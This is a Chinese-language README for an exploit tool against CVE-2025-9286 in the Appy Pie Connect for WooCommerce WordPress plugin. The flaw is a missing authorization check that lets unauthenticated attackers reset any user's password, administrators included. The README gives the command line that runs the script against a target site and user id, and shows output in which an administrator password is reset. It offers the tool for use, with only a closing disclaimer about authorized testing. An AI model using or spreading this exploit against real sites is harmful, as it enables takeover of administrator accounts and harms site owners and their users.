Appy Pie Connect for WooCommerce <= 1.1.2 - 授权缺失导致未认证权限提升
Appy Pie Connect for WooCommerce 的 WordPress 插件在所有版本(包括 1.1.2)中,由于 reset_user_password() REST 处理程序缺少授权,存在权限提升漏洞。
这使得未认证攻击者能够重置任意用户(包括管理员)的密码,从而获取管理权限。
以下利用脚本可用于针对运行该易受攻击插件版本的 WordPress 站点利用 CVE-2025-9286。
脚本名称: CVE-2025-9286.py
python CVE-2025-9286.py -u http://nxploit.ddev.site/ -id 1
[+] 检查插件版本:http://nxploit.ddev.site/wp-content/plugins/appy-pie-connect-for-woocommerce/readme.txt
[!] 检测到易受攻击的插件(1.1.2)。正在尝试利用...
[*] 请稍候,正在尝试更改密码...
[+] 利用成功!密码已重置。
[*] 新密码:Nxploited
[+] 漏洞已利用,密码已成功更改。
此利用脚本仅用于教育和授权的渗透测试目的。
未经明确许可对系统进行未授权使用属于违法行为。
作者不对因使用此工具造成的任何误用或损害负责。
作者:Khaled Alenazi (Nxploited)